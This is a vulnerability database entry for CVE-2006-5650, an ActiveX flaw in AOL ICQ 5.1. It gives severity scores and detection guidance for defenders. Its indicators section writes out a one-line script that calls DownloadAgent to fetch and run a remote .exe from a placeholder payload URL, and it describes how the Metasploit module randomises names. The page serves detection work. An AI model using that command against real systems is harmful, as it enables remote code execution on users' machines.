cbcvebase.
CVE-2006-5650
published 2006-11-07

CVE-2006-5650: The ICQPhone.SipxPhoneManager ActiveX control in America Online ICQ 5.1 allows remote attackers to download and execute arbitrary code via the DownloadAgent…

PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
66.37%
99.2th percentile
The ICQPhone.SipxPhoneManager ActiveX control in America Online ICQ 5.1 allows remote attackers to download and execute arbitrary code via the DownloadAgent function, as demonstrated using an ICQ avatar.

Affected

1 ranges
VendorProductVersion rangeFixed in
aolicq

Detection & IOCsextracted from sources · hover to see the quote

other54BDE6EC-F42F-4500-AC46-905177444300
commandnew ActiveXObject('ICQPhone.SipxPhoneManager.1'); .DownloadAgent("<payload_url>/<exe>.exe");
urlhttp://www.zerodayinitiative.com/advisories/ZDI-06-037/
  • Detect instantiation of the vulnerable ActiveX control by its ProgID 'ICQPhone.SipxPhoneManager.1' or CLSID '54BDE6EC-F42F-4500-AC46-905177444300' in HTML/script content delivered over HTTP.
  • Inspect HTTP responses for calls to the DownloadAgent method on the ICQPhone.SipxPhoneManager ActiveX object; the method is used to fetch and execute a remote .exe payload.
  • HTTP response serving the exploit delivers 'Content-Type: application/octet-stream' for the PE payload; correlate with a prior HTML page referencing CLSID 54BDE6EC-F42F-4500-AC46-905177444300 to identify the full attack chain.
  • The exploit can be triggered via an ICQ message (e.g., a malicious avatar), so monitor ICQ client network traffic for outbound HTTP requests to attacker-controlled hosts fetching .exe files shortly after message receipt.
  • ·The Metasploit module uses randomised variable names (rand_text_alpha) and randomised uppercase .exe filenames (rand_text_alpha_upper), so static string matching on variable names or filenames in the HTML payload will not be reliable; detection should focus on the stable ProgID/CLSID and DownloadAgent method call pattern.
  • ·The module's URIPATH defaults to '/' and the payload is served under a '/PAYLOAD' sub-path; the actual URI is configurable by the attacker, so path-based detection alone is insufficient.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.